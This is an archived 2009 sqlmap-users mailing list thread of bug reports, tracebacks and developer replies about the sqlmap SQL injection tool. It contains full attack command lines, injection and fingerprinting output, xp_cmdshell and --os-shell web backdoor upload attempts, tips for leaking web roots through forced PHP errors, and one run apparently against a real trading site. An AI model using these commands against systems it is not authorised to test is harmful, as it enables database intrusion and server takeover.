sqlmap-users — sqlmap users mailing list

[sqlmap-users] Blind injection possible - no output

[Erik N. <da...@gm...>]

sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2;
__utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
__utmb=107765125.29.10.1252406202; __utmc=107765125;
PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9"
--url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id
--string="Secret Forum" --fingerprint

[14:09:04] [INFO] GET parameter 'id' is unescaped numeric injectable
with 0 parenthesis
[14:09:04] [INFO] testing for parenthesis on injectable parameter
[14:09:06] [INFO] the injectable parameter requires 0 parenthesis
[14:09:06] [INFO] testing MySQL
[14:09:07] [INFO] confirming MySQL
[14:09:08] [INFO] retrieved:
[14:09:10] [INFO] the back-end DBMS is MySQL
[14:09:10] [INFO] retrieved:
[14:11:28] [INFO] retrieved:
[14:11:32] [INFO] retrieved:
[14:11:35] [INFO] retrieved:
[14:11:41] [INFO] retrieved:
[14:11:46] [INFO] executing MySQL comment injection fingerprint
web server operating system: Linux Ubuntu
web application technology: PHP 5.2.6, Apache
back-end DBMS: active fingerprint: MySQL < 3.22.11
               comment injection fingerprint: MySQL 5.0.75


[*] shutting down at: 14:12:50


sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2;
__utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
__utmb=107765125.29.10.1252406202; __utmc=107765125;
PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9"
--url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id
--string="Secret Forum" --current-db

[14:14:01] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 pare
nthesis
[14:14:01] [INFO] testing for parenthesis on injectable parameter
[14:14:03] [INFO] the injectable parameter requires 0 parenthesis
[14:14:03] [INFO] testing MySQL
[14:14:04] [INFO] confirming MySQL
[14:14:05] [INFO] retrieved:
[14:14:07] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.2.6, Apache
back-end DBMS: MySQL < 5.0.0

[14:14:07] [INFO] fetching current database
[14:14:07] [INFO] retrieved:
current database:       None


What to do?

[sqlmap-users] Can you use sqlmap with mod_rewrite URLs?

[Kyle A. <ky...@xk...>]

Hello,
Can anyone think of a way to use sqlmap in a situation with clean urls
using mod_rewrite? (Which is very popular now-a-days)

An example might be my mythtv web interface:
http://192.168.1.1/mythweb/tv/detail/1004/1252278000

Internally it is reading the module, chanid, and start time from the
url. It is NOT possible to use something like
index.php?chanid=104&time=1254...

Is there any way to use sqlmap in this situation?

Kyle

[sqlmap-users] Bug Report

[Matthias K. <zac...@gm...>]

Hi SQLMAP-Team,

I'd like to send you a bug report.
If you need more details (e.g. URL) just let me know !

Thanks for your support,

Zach

------------



[23:02:24] [ERROR] unhandled exception in sqlmap/0.8-dev1, please copy  
the command line and the following text and send by e-mail to sql...@li... 
. The developer will fix it as soon as possible:
sqlmap version: 0.8-dev1
Python version: 2.6.2
Operating system: darwin
Traceback (most recent call last):
   File "./sqlmap.py", line 84, in main
     start()
   File "/Users/zach/SQL/sqlmap/lib/controller/controller.py", line  
210, in start
     injType = checkSqlInjection(place, parameter, value, parenthesis)
   File "/Users/zach/SQL/sqlmap/lib/controller/checks.py", line 98, in  
checkSqlInjection
     trueResult = Request.queryPage(payload, place)
   File "/Users/zach/SQL/sqlmap/lib/request/connect.py", line 274, in  
queryPage
     page, headers = Connect.getPage(get=get, post=post,  
cookie=cookie, ua=ua, silent=silent)
   File "/Users/zach/SQL/sqlmap/lib/request/connect.py", line 166, in  
getPage
     page            = conn.read()
   File "/Library/Frameworks/Python.framework/Versions/2.6/lib/ 
python2.6/socket.py", line 327, in read
     data = self._sock.recv(rbufsize)
   File "/Library/Frameworks/Python.framework/Versions/2.6/lib/ 
python2.6/httplib.py", line 517, in read
     return self._read_chunked(amt)
   File "/Library/Frameworks/Python.framework/Versions/2.6/lib/ 
python2.6/httplib.py", line 578, in _read_chunked
     value += self._safe_read(chunk_left)
   File "/Library/Frameworks/Python.framework/Versions/2.6/lib/ 
python2.6/httplib.py", line 619, in _safe_read
     raise IncompleteRead(''.join(s), amt)
IncompleteRead: IncompleteRead(328 bytes read, 7260 more expected)

[*] shutting down at: 23:02:24

Re: [sqlmap-users] bug

[Patrick W. <pa...@au...>]

If you read the error - permission denied to write file... fixing your
folder permissions would help!

Though I would advise against using SQL injection against the Vietnam Stock
Trading Platform without legal permission.

-Patrick

On Mon, Aug 24, 2009 at 11:16 AM, dang tu <tud...@gm...> wrote:

> [12:04:58] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
> [12:05:00] [WARNING] Cookie parameter 'jsessionid' is not dynamic
> [12:05:04] [ERROR] unhandled exception in sqlmap/0.7rc1, please copy the
> command line and the following text and send by e-mail to
> sql...@li.... The developer will fix it as soon as
> possible:
> sqlmap version: 0.7rc1
> Python version: 2.5.2
> Operating system: linux2
> Traceback (most recent call last):
>   File "./sqlmap.py", line 81, in main
>     start()
>   File
> "/space/backtrack/microverse/s/sqlmap/SQLMAP-0.6.4-BT1/pentest/database/sqlmap/lib/controller/controller.py",
> line 264, in start
>   File
> "/space/backtrack/microverse/s/sqlmap/SQLMAP-0.6.4-BT1/pentest/database/sqlmap/lib/core/target.py",
> line 234, in createTargetDirs
>   File
> "/space/backtrack/microverse/s/sqlmap/SQLMAP-0.6.4-BT1/pentest/database/sqlmap/lib/core/dump.py",
> line 62, in setOutputFile
> IOError: [Errno 13] Permission denied: '/pentest/database/sqlmap/output/
> www.tas.com.vn/log'
>
> [*] shutting down at: 12:05:04
>
>
>
> ------------------------------------------------------------------------------
> Let Crystal Reports handle the reporting - Free Crystal Reports 2008 30-Day
> trial. Simplify your report design, integration and deployment - and focus
> on
> what you do best, core application coding. Discover what's new with
> Crystal Reports now.  http://p.sf.net/sfu/bobj-july
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

[sqlmap-users] regex error

[Ignacio H. <nac...@gm...>]

Hi all,
There is an error in one of the regex used to find absolute file paths in
order to upload a shell when there is not available the ' stacked queries'
on the parameter. The regex is "([\w]\:[\/\\\\]+)" located at line 76 of
file /sqlmap/lib/request. I dont know why (because i dont understand that
regex) but it always find a positive match in "p:" and sometimes in "s:" and
gives it back as absolute file paths.
I think is due to url strings in the page code. The regex  matches things
like "http:\\domain.com/whatever" and returns "p:"  as a valid absolute path
(or "s:" if the url is ssl). To avoid this maybe the regex can be changed to
"([\r\w]\:[\/\\\\]+)" if the real absolute file path is at the begining of a
word.
This happens in version 7.0 and 0.8-dev1 and in version 0.8-dev1 there is
also someting else wrong with --os-shell: after providing full paths and the
language that server supports it just cant connect the server. This is the
output:

[20:25:18] [WARNING] unable to retrieve the web server document root
please provide the web server document root [/var/www/]:
[20:26:09] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload the
agent [/var/www/test/]:
[20:26:51] [INFO] trying to upload the uploader agent
which web application language does the web server support?
[1] ASP
[2] PHP (default)
[3] JSP
> 2
[20:26:57] [WARNING] unable to connect to the target url or proxy, sqlmap is
going to retry the request
[20:26:58] [WARNING] unable to connect to the target url or proxy, sqlmap is
going to retry the request
[20:26:59] [WARNING] unable to connect to the target url or proxy, sqlmap is
going to retry the request
[20:27:00] [ERROR] unable to connect to the target url or proxy

This doesnt happens in version 7.0.

Cheers,
                Nacho

[sqlmap-users] bug

[dang tu <tud...@gm...>]

[12:04:58] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[12:05:00] [WARNING] Cookie parameter 'jsessionid' is not dynamic
[12:05:04] [ERROR] unhandled exception in sqlmap/0.7rc1, please copy the
command line and the following text and send by e-mail to
sql...@li.... The developer will fix it as soon as
possible:
sqlmap version: 0.7rc1
Python version: 2.5.2
Operating system: linux2
Traceback (most recent call last):
  File "./sqlmap.py", line 81, in main
    start()
  File
"/space/backtrack/microverse/s/sqlmap/SQLMAP-0.6.4-BT1/pentest/database/sqlmap/lib/controller/controller.py",
line 264, in start
  File
"/space/backtrack/microverse/s/sqlmap/SQLMAP-0.6.4-BT1/pentest/database/sqlmap/lib/core/target.py",
line 234, in createTargetDirs
  File
"/space/backtrack/microverse/s/sqlmap/SQLMAP-0.6.4-BT1/pentest/database/sqlmap/lib/core/dump.py",
line 62, in setOutputFile
IOError: [Errno 13] Permission denied: '/pentest/database/sqlmap/output/
www.tas.com.vn/log'

[*] shutting down at: 12:05:04

[sqlmap-users] os-shell bug

[ehmo <dis...@gm...>]

[18:57:06] [INFO] testing stacked queries support on parameter 'ID'
[18:57:13] [INFO] the web application supports stacked queries on parameter 'ID'

[18:57:13] [INFO] testing if current user is DBA
[18:57:13] [INFO] retrieved: 0
[18:57:26] [WARNING] the functionality requested might not work because the sess
ion user is not a database administrator
[18:57:26] [INFO] checking if xp_cmdshell extended procedure is available, wait.
.
xp_cmdshell extended procedure does not seem to be available. Do you want sqlmap
 to try to re-enable it? [Y/n] y
[20:30:00] [ERROR] unhandled exception in sqlmap/0.8-dev1, please copy the comma
nd line and the following text and send by e-mail to sql...@li...urcefo
rge.net. The developer will fix it as soon as possible:
sqlmap version: 0.8-dev1
Python version: 2.5.4
Operating system: win32
Traceback (most recent call last):
  File "c:\dev\sqlmap-dev\sqlmap.py", line 84, in main
    start()
  File "c:\dev\sqlmap-dev\lib\controller\controller.py", line 263, in
start
    action()
  File "c:\dev\sqlmap-dev\lib\controller\action.py", line 140, in acti
on
    conf.dbmsHandler.osShell()
  File "c:\dev\sqlmap-dev\plugins\generic\takeover.py", line 300, in o
sShell
    self.initEnv()
  File "c:\dev\sqlmap-dev\lib\takeover\abstraction.py", line 168, in i
nitEnv
    self.xpCmdshellInit(mandatory)
  File "c:\dev\sqlmap-dev\lib\takeover\xp_cmdshell.py", line 181, in x
pCmdshellInit
    self.__xpCmdshellConfigure(1)
  File "c:\dev\sqlmap-dev\lib\takeover\xp_cmdshell.py", line 106, in _
_xpCmdshellConfigure
    if kb.dbmsVersion[0] in ( "2005", "2008" ):
IndexError: list index out of range

[sqlmap-users] bugs

[<ja...@ev...>]

Hi,

Newest SVN. Python is rather old on this box, I'd be willing to upgrade 
and retry if this error isnt reproduceable.

[17:44:45] [WARNING] the functionality requested might not work because 
the session user is not a database administrator
[17:44:45] [INFO] checking if xp_cmdshell extended procedure is available, 
wait..
xp_cmdshell extended procedure does not seem to be available. Do you want 
sqlmap to try to re-enable it? [Y/n] y
[17:45:05] [ERROR] unhandled exception in sqlmap/0.8-dev1, please copy the 
command line and the following text and send by e-mail to 
sql...@li.... The developer will fix it as soon as 
possible:
sqlmap version: 0.8-dev1
Python version: 2.4.4
Operating system: linux2
Traceback (most recent call last):
   File "./sqlhax", line 84, in main
     start()
   File "/nfs/sqlmap/lib/controller/controller.py", line 263, 
in start
     action()
   File "/nfs/sqlmap/lib/controller/action.py", line 140, in 
action
     conf.dbmsHandler.osShell()
   File "/nfs/sqlmap/plugins/generic/takeover.py", line 300, 
in osShell
     self.initEnv()
   File "/nfs/sqlmap/lib/takeover/abstraction.py", line 168, 
in initEnv
     self.xpCmdshellInit(mandatory)
   File "/nfs/sqlmap/lib/takeover/xp_cmdshell.py", line 181, 
in xpCmdshellInit
     self.__xpCmdshellConfigure(1)
   File "/nfs/sqlmap/lib/takeover/xp_cmdshell.py", line 106, 
in __xpCmdshellConfigure
     if kb.dbmsVersion[0] in ( "2005", "2008" ):
IndexError: list index out of range

Also, for anyone on the list who is actually interested check out this 
cheat sheet, its pretty awesome.

http://pentestmonkey.net/blog/mysql-sql-injection-cheat-sheet/

Cheers,
James

Re: [sqlmap-users] Missing SQLMap Feature

[Bernardo D. A. G. <ber...@gm...>]

Hi Walter,

On Mon, Aug 17, 2009 at 18:34, Walter
Stanish<wal...@sa...> wrote:
> ...
>  - no automatic extraction of forms / ajax URLs (could detect common
> javascript framework ajax requests/URLs from linked .js sourcefiles)

sqlmap has no crawling/spidering functionality and I have no plans to
implement such.
However, you can surf the site via WebScarab or Burp logging all
requests in a log file then pass it to sqlmap with -l command line
option.

>      … There should be an option to ‘force testing of all parameters’ or
> ‘force testing of specific parameters’.  (I had to hack the source to make
> checkDynParam ‘return True’ to fix this.)

Read the manual, also -h is enough for the list of options!
The option is -p. It skips the dynamicity test.

>  - you could also add ‘Accept-lang:’ as a field to test, as some
> multilingual sites will be parsing this

I will refactor the detection phase in the mid term and perhaps
include this too.

Cheers,
-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F

[sqlmap-users] information_schema not avaible

[ehmo <dis...@gm...>]

Hey guys,
i'm very curious about this thing.

If back-end DB is MySQL < 5.0, SQLmap will always stop table lookup
with this error.
[ERROR] information_schema not available, back-end DBMS is MySQL < 5.0

but this MySQL version doesn't have information_schema and i'm
curious, why it will not to try guess all tables. Or exist any way in
SQLmap how to get list of tables, if informatiom_schema is not
avaible?

Also, you should to add option for injecting referer, because
sometimes is sqli there and sqlmpa doesn't know this method.

thnx

[sqlmap-users] Dynamic parameter

[Ľuboš K. <lub...@gm...>]

Hello,

I have an issue with sqlmap 0.7. I know that the parameter vid from URL I
want to test is injectable with union but sqlmap comes to the statement that
it isn't:
[12:53:04] [WARNING] GET parameter 'vid' is not injectable

I provided also the string which is in the page content of the url I
provided.

DB is MySQL 5.0.
If you want I can give you the url so you can debug why it evaluates badly.

Regards,

Lubos

Re: [sqlmap-users] unhandled exception

[Bernardo D. A. G. <ber...@gm...>]

Hi Lee,

On Mon, Aug 10, 2009 at 16:11, Lawson, Lee<Lee...@dn...> wrote:
> ...
> [16:08:53] [ERROR] unhandled exception in sqlmap/0.7, please copy the
> command line and the following text and send by e-mail to sqlmap-users
>
> @lists.sourceforge.net. The developer will fix it as soon as possible:
>
> sqlmap version: 0.7
>
> Python version: 2.6.1
>
> Operating system: win32
>
> Traceback (most recent call last):
>
>   File "sqlmap.py", line 84, in main
>
>   File "lib\controller\controller.pyc", line 263, in start
>
>   File "lib\controller\action.pyc", line 97, in action
>
>   File "plugins\generic\enumeration.pyc", line 176, in getUsers
>
> IndexError: list index out of range

Thanks for reporting. It should be fixed now. svn update.

Cheers,
-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F

Re: [sqlmap-users] some bugs

[Bernardo D. A. G. <ber...@gm...>]

Hi pUm,

On Fri, Aug 7, 2009 at 09:19, pUm<hi...@go...> wrote:
> ...
> bugs:
> 1. encoding %:
> the percent is encoded - really strange. If you put in %25 it will
> encode it to %% and stuff like that. we were not able to inject a %
> only on one parameter.

This is something I will have a closer look soon.

> 2. postfix/prefix string:
> the postfix string just disappears on some requests (post request)

I can't reproduce this bug. Can you please double check and send me
the exact -v 3 output?

> 3. testing connection
> on post injection the test connect to the url is done as a get
> request, even if you provided --data, this is a bad thing, for us it
> logged out the user after doing a get request on a post request ;)

In my tests and from the source code it is clear that if you specify
--data it always goes with the HTTP POST method. Also, I sniffed the
traffic to double check it, and it goes POST from the very first HTTP
request.

> suggested enhancements:
> - define the "random" char that gets injected on a true injection (so
> that it does not becomes so much more random ;)) - I will write a
> patch for this if I've got some time

What's the benefit?

> - using OR instead of AND, I know, you've got the request a way to
> often, but I've actually got again a reason for this to raise up again
> ;)
> - running time and stacked queries without the AND injection. for
> example, test all stacked query possiblities ...

In the long run the SQL injection detection phase will be done by
parsing a (huge) XML file where the user will be able to define less
or more tests to do, the engine will be then completely rewritten to
parse this XML file.

> thanks for the nice tool. I really enjoy it

Welcome!

Cheers,
-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F

[sqlmap-users] some bugs

[pUm <hi...@go...>]

Hi all,

we come across a few bugs in sqlmap during one of our tests.

bugs:
1. encoding %:
the percent is encoded - really strange. If you put in %25 it will
encode it to %% and stuff like that. we were not able to inject a %
only on one parameter.

2. postfix/prefix string:
the postfix string just disappears on some requests (post request)

3. testing connection
on post injection the test connect to the url is done as a get
request, even if you provided --data, this is a bad thing, for us it
logged out the user after doing a get request on a post request ;)

suggested enhancements:
- define the "random" char that gets injected on a true injection (so
that it does not becomes so much more random ;)) - I will write a
patch for this if I've got some time
- using OR instead of AND, I know, you've got the request a way to
often, but I've actually got again a reason for this to raise up again
;)
- running time and stacked queries without the AND injection. for
example, test all stacked query possiblities ...

thanks for the nice tool. I really enjoy it

cheers

sven

P.S.: using the latest svn version

Re: [sqlmap-users] A bug and a sugestion

[Bernardo D. A. G. <ber...@gm...>]

Hi Stuffe,

On Wed, Jul 29, 2009 at 17:22, Stuffe<stu...@gm...> wrote:
> I just fired up the version of sqlmap, but it couldnt find the web root,
> although it should be simple to do.
> A simple regex could identify all php errors, they all start like <b>Parse
> error</b>:, <b>Notice</n>:, <b>Warning</b>:, <b>Fatal error</b>: etc,
> After that comes some random crap and then comes the url you are looking
> for, inside a <b> tag, eg. <b>C:\wamp\www\index.php</b>.
> Here are some examples:
> <b>Notice</b>: Undefined index: b in <b>C:\wamp\www\index.php</b> on line
> <b>12</b>
> <b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL
> result resource in <b>C:\wamp\www\index.php</b> on line <b>14</b>
> <b>Parse error</b>: parse error, expecting `'('' in
> <b>C:\wamp\www\index.php</b> on line <b>28</b>
> As you can see, they are not hard to extract with a regex. And they can
> often be generated, if you insert something that brakes the sql query or by
> typecasting the a get var as an array
> (like index.php?a[]=now_a_becomes_an_array) or other tricks.

I will improve the HTML parsing function as soon as possible, thanks
for reporting.

> Any way, when the error message is found, it should be checked wheather or
> not the last part of the url is equal to the last part of the internal
> path,
> if they are equal, you know the webroot.
> ...

This is done already. If it does not work, then it's a bug. Let me know.

> Any way, It also crashed on me when I tried to upload a webshell:
> C:\Documents and Settings\Administrator>"C:\Documents and
> Settings\Administrator
> \Desktop\sqlmap-0.7_exe\sqlmap.exe" -u http://localhost/?a=1 --os-shell
>     sqlmap/0.7
>     by Bernardo Damele A. G. <ber...@gm...>
> [*] starting at: 17:37:18
> [17:37:18] [INFO] testing connection to the target url
> [17:37:18] [INFO] testing if the url is stable, wait a few seconds
> [17:37:19] [INFO] url is stable
> [17:37:19] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
> [17:37:20] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
> [17:37:20] [INFO] testing if GET parameter 'a' is dynamic
> [17:37:20] [INFO] confirming that GET parameter 'a' is dynamic
> [17:37:20] [INFO] GET parameter 'a' is dynamic
> [17:37:20] [INFO] testing sql injection on GET parameter 'a' with 0
> parenthesis
> [17:37:20] [INFO] testing unescaped numeric injection on GET parameter 'a'
> [17:37:20] [INFO] confirming unescaped numeric injection on GET parameter
> 'a'
> [17:37:20] [INFO] GET parameter 'a' is unescaped numeric injectable with 0
> paren
> thesis
> [17:37:20] [INFO] testing for parenthesis on injectable parameter
> [17:37:20] [INFO] the injectable parameter requires 0 parenthesis
> [17:37:20] [INFO] testing MySQL
> [17:37:20] [INFO] confirming MySQL
> [17:37:20] [INFO] retrieved: 9
> [17:37:20] [INFO] the back-end DBMS is MySQL
> web server operating system: Windows
> web application technology: Apache 2.0.63, PHP 5.2.9
> back-end DBMS: MySQL >= 5.0.0
> [17:37:20] [INFO] testing stacked queries support on parameter 'a'
> [17:37:20] [INFO] detecting back-end DBMS version from its banner
> [17:37:20] [INFO] retrieved: 5.1.33
> [17:37:20] [WARNING] the web application does not support stacked queries on
> par
> ameter 'a'
> [17:37:20] [INFO] going to upload a web page backdoor for command execution
> [17:37:20] [INFO] fingerprinting the back-end DBMS operating system
> [17:37:20] [INFO] retrieved: c
> [17:37:20] [INFO] the back-end DBMS operating system is Windows
> [17:37:20] [WARNING] unable to retrieve the web server document root
> please provide the web server document root [C:/Inetpub/wwwroot/]:
> C:/wamp/www/
> [17:37:46] [INFO] retrieved web server full paths: 'C:\wamp\www, C:\'
> please provide any additional web server full path to try to upload the
> agent [C
> :/Inetpub/wwwroot/test/]: C:/wamp/www/test/
> [17:37:51] [INFO] trying to upload the uploader agent
> which web application language does the web server support?
> [1] ASP
> [2] PHP (default)
> [3] JSP
>> 2
> [17:37:53] [ERROR] unhandled exception in sqlmap/0.7, please copy the
> command li
> ne and the following text and send by e-mail to
> sql...@li...urceforge.n
> et. The developer will fix it as soon as possible:
> sqlmap version: 0.7
> Python version: 2.6.1
> Operating system: win32
> Traceback (most recent call last):
>   File "sqlmap.py", line 84, in main
>   File "lib\controller\controller.pyc", line 263, in start
>   File "lib\controller\action.pyc", line 140, in action
>   File "plugins\generic\takeover.pyc", line 295, in osShell
>   File "plugins\generic\takeover.pyc", line 187, in __webBackdoorInit
>   File "lib\request\connect.pyc", line 131, in getPage
>   File "urllib2.pyc", line 124, in urlopen
>   File "urllib2.pyc", line 383, in open
>   File "urllib2.pyc", line 401, in _open
>   File "urllib2.pyc", line 361, in _call_chain
>   File "urllib2.pyc", line 1130, in http_open
>   File "urllib2.pyc", line 1087, in do_open
>   File "httplib.pyc", line 656, in __init__
>   File "httplib.pyc", line 668, in _set_hostport
> InvalidURL: nonnumeric port: '80\test'
> [*] shutting down at: 17:37:53

This bug is fixed and commited now. Please, let me know if the web
root works properly in your test environment or if you find any other
bug.

Cheers,
-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F

[sqlmap-users] A bug and a sugestion

[Stuffe <stu...@gm...>]

I just fired up the version of sqlmap, but it couldnt find the web root,
although it should be simple to do.

A simple regex could identify all php errors, they all start like <b>Parse
error</b>:, <b>Notice</n>:, <b>Warning</b>:, <b>Fatal error</b>: etc,
After that comes some random crap and then comes the url you are looking
for, inside a <b> tag, eg. <b>C:\wamp\www\index.php</b>.

Here are some examples:
<b>Notice</b>: Undefined index: b in <b>C:\wamp\www\index.php</b> on line
<b>12</b>
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL
result resource in <b>C:\wamp\www\index.php</b> on line <b>14</b>
<b>Parse error</b>: parse error, expecting `'('' in <b>C:\wamp\www\index.php
</b> on line <b>28</b>

As you can see, they are not hard to extract with a regex. And they can
often be generated, if you insert something that brakes the sql query or by
typecasting the a get var as an array
(like index.php?a[]=now_a_becomes_an_array) or other tricks.

Any way, when the error message is found, it should be checked wheather or
not the last part of the url is equal to the last part of the internal
path,
if they are equal, you know the webroot.

eg. http://example.com/whatever/index.php gives the error:
<b>Notice</b>: Undefined index: b in
<b>C:\wamp\www\whatever\index.php</b>on line
<b>12</b>

you replace \ with / and compare:
http://example.com/whatever/index.php
with
C:/wamp/www/whatever/index.php

and see find that C:/wamp/www/ must be the webroot.

Now i dont know if or how sqlmap is trying to retrieve the webroot, but it
wasnt able to find these things in my tests (even though they were all over
the place).

Any way, It also crashed on me when I tried to upload a webshell:

C:\Documents and Settings\Administrator>"C:\Documents and
Settings\Administrator
\Desktop\sqlmap-0.7_exe\sqlmap.exe" -u http://localhost/?a=1 --os-shell

    sqlmap/0.7
    by Bernardo Damele A. G. <ber...@gm...>

[*] starting at: 17:37:18

[17:37:18] [INFO] testing connection to the target url
[17:37:18] [INFO] testing if the url is stable, wait a few seconds
[17:37:19] [INFO] url is stable
[17:37:19] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[17:37:20] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[17:37:20] [INFO] testing if GET parameter 'a' is dynamic
[17:37:20] [INFO] confirming that GET parameter 'a' is dynamic
[17:37:20] [INFO] GET parameter 'a' is dynamic
[17:37:20] [INFO] testing sql injection on GET parameter 'a' with 0
parenthesis
[17:37:20] [INFO] testing unescaped numeric injection on GET parameter 'a'
[17:37:20] [INFO] confirming unescaped numeric injection on GET parameter
'a'
[17:37:20] [INFO] GET parameter 'a' is unescaped numeric injectable with 0
paren
thesis
[17:37:20] [INFO] testing for parenthesis on injectable parameter
[17:37:20] [INFO] the injectable parameter requires 0 parenthesis
[17:37:20] [INFO] testing MySQL
[17:37:20] [INFO] confirming MySQL
[17:37:20] [INFO] retrieved: 9
[17:37:20] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.0.63, PHP 5.2.9
back-end DBMS: MySQL >= 5.0.0

[17:37:20] [INFO] testing stacked queries support on parameter 'a'
[17:37:20] [INFO] detecting back-end DBMS version from its banner
[17:37:20] [INFO] retrieved: 5.1.33
[17:37:20] [WARNING] the web application does not support stacked queries on
par
ameter 'a'
[17:37:20] [INFO] going to upload a web page backdoor for command execution
[17:37:20] [INFO] fingerprinting the back-end DBMS operating system
[17:37:20] [INFO] retrieved: c
[17:37:20] [INFO] the back-end DBMS operating system is Windows
[17:37:20] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/Inetpub/wwwroot/]:
C:/wamp/www/
[17:37:46] [INFO] retrieved web server full paths: 'C:\wamp\www, C:\'
please provide any additional web server full path to try to upload the
agent [C
:/Inetpub/wwwroot/test/]: C:/wamp/www/test/
[17:37:51] [INFO] trying to upload the uploader agent
which web application language does the web server support?
[1] ASP
[2] PHP (default)
[3] JSP
> 2
[17:37:53] [ERROR] unhandled exception in sqlmap/0.7, please copy the
command li
ne and the following text and send by e-mail to
sql...@li...urceforge.n
et. The developer will fix it as soon as possible:
sqlmap version: 0.7
Python version: 2.6.1
Operating system: win32
Traceback (most recent call last):
  File "sqlmap.py", line 84, in main
  File "lib\controller\controller.pyc", line 263, in start
  File "lib\controller\action.pyc", line 140, in action
  File "plugins\generic\takeover.pyc", line 295, in osShell
  File "plugins\generic\takeover.pyc", line 187, in __webBackdoorInit
  File "lib\request\connect.pyc", line 131, in getPage
  File "urllib2.pyc", line 124, in urlopen
  File "urllib2.pyc", line 383, in open
  File "urllib2.pyc", line 401, in _open
  File "urllib2.pyc", line 361, in _call_chain
  File "urllib2.pyc", line 1130, in http_open
  File "urllib2.pyc", line 1087, in do_open
  File "httplib.pyc", line 656, in __init__
  File "httplib.pyc", line 668, in _set_hostport
InvalidURL: nonnumeric port: '80\test'

[*] shutting down at: 17:37:53

Re: [sqlmap-users] sqlmap --os-shell doesn't work on 64-bit PostgreSQL

[Bernardo D. A. G. <ber...@gm...>]

Hi Sven,

On Wed, Jul 29, 2009 at 11:50, Sven Klemm<sv...@c3...> wrote:
> ...
> the sqmlmap sys_eval function for PostgreSQL does not work on 64-bit
> PostgreSQL because it's 32-bit. There should probably be different
> payloads for 32 bit and 64-bit. I'm seeing the following error in the
> database logs:
> 2009-07-29 12:40:55 CEST ERROR:  could not load library
> "/tmp/libsqlmapudfqrwmq.so": /tmp/libsqlmapudfqrwmq.so: wrong ELF
> class: ELFCLASS32

Yes, the shared libraries, both .so and .dll should be compiled
respectively with GCC and Visual C++ on a 64-bit system to work there
too.
Unfortunately I've not access to any 64-bit system so you and everyone
else is welcome to contribute with a pre-compiled 64-bit version of
the three .so (MySQL, PostgreSQL 8.2 and PostgreSQL 8.3). and three
.dll (MySQL, PostgreSQL 8.2 and PostgreSQL 8.3). The source code is
available under the extra/ folder on the SVN repository and in case
you need help in compiling them, just get back to me privately; it's
not always trivial on Windows.

Cheers,
-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F

[sqlmap-users] sqlmap --os-shell doesn't work on 64-bit PostgreSQL

[Sven K. <sv...@c3...>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi,

the sqmlmap sys_eval function for PostgreSQL does not work on 64-bit
PostgreSQL because it's 32-bit. There should probably be different
payloads for 32 bit and 64-bit. I'm seeing the following error in the
database logs:
2009-07-29 12:40:55 CEST ERROR:  could not load library
"/tmp/libsqlmapudfqrwmq.so": /tmp/libsqlmapudfqrwmq.so: wrong ELF
class: ELFCLASS32

Cheers,
Sven

- --
Sven Klemm
http://cthulhu.c3d2.de/~sven/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkpwKXIACgkQevlgTHEIT4ZjhQCfeo69MQVuNhP/yKYCfZsPjN6w
HSUAn11ovBTsYpbSqTDi+EC3bgXF0OI6
=4ACM
-----END PGP SIGNATURE-----

Re: [sqlmap-users] Database enumeration for PostgreSQL shows schemas instead of databases

[Bernardo D. A. G. <ber...@gm...>]

Patch tested and commited.
Thanks for reporting.

On Wed, Jul 29, 2009 at 10:42, Sven Klemm<sv...@c3...> wrote:
> Hi,
>
> When runnning sqlmap --dbs on a PostgreSQL backend sqlmap lists all
> the schemas of the current database instead of the names of all
> databases.
> I've attached a patch that fixes the problem.
>
>
> Cheers,
> Sven
>
> --
> Sven Klemm
> http://cthulhu.c3d2.de/~sven/


-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F

Re: [sqlmap-users] Exception when fetching banner on PostgreSQL

[Bernardo D. A. G. <ber...@gm...>]

Fixed and commited.
Thanks for reporting.

On Wed, Jul 29, 2009 at 10:24, Sven Klemm<sv...@c3...> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Hi,
>
> I'm getting an exception when running the following command:
>
> ./sqlmap.py -u 'http://10.2.0.100/pg.php?user=sven' -b
>
> The backend database is PostgreSQL 8.3.7 and I'm running sqlmap from SVN.
>
